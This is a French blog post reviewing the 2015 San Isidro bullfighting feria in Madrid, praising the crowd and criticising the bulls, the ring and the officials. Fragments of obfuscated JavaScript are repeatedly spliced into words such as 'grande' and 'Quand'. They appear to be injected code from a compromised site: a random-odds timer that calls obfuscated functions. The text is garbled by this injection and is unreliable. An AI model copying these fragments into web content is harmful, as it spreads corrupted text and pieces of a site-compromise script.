UN BON SAN ISIDRO 2015

Une grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande faena de Sébastien Castella et le grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and toro, de El torero, auquel il la fit, ont été jusqu’à présent les temps forts de cette feria de San Isidro. Mais au cours des autres corridas on a vu des choses importantes, des toreros avec du don de soi, du courage et de la dextérité, et un éventail de novilleros qui incitent bien des espoirs. Même si nous devons regretter qu’on les a confrontés à de véritables corridas de toros, ce qui en dit long sur le comportement des vétérinaires et présidents de corridas.

Ce qu’il y a de mieux dans cette feria c’est le public, qui généralement s’impose à l’intransigeance des « ayatollahs » du purisme et du torisme. Et je parle d’intransigeance, une conduite qui n’a rien à voir avec l’exigence. Pour celle-ci il faut de la rigueur et de la connaissance, et pour l’intransigeance, un mauvais esprit et de la méconnaissance. Heureusement, l’opinion de la majorité a fini par prévaloir, même à l’encontre des présidents, qui semblent toujours être plus à l’aise avec l’intempérance inquisitoriale.

Tout est fait pour qu’échoue le toreo dans les arènes de Madrid. D’abord il y a le toro, choisi par la dimension de ses cornes, ce qui empêche de le faire par familles et par morphologie ; en second il y a la piste, avec un dénivelé conique qui conditionne le rythme des charges et les marque avec une vitesse irrégulière ; et en troisième, le réglementarisme qui confond la complexité du toreo avec le plan d’un designer.

Voir des toros à Madrid est souvent exaspérant, mais lors de cette feria on compte plus de victoire de ce public sensible et pas bête du tout que de supplices des « torquemadas ».

Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and cette feria aura conclu j’en ferai un bilan détaillé.

 

Les commentaires sont fermés.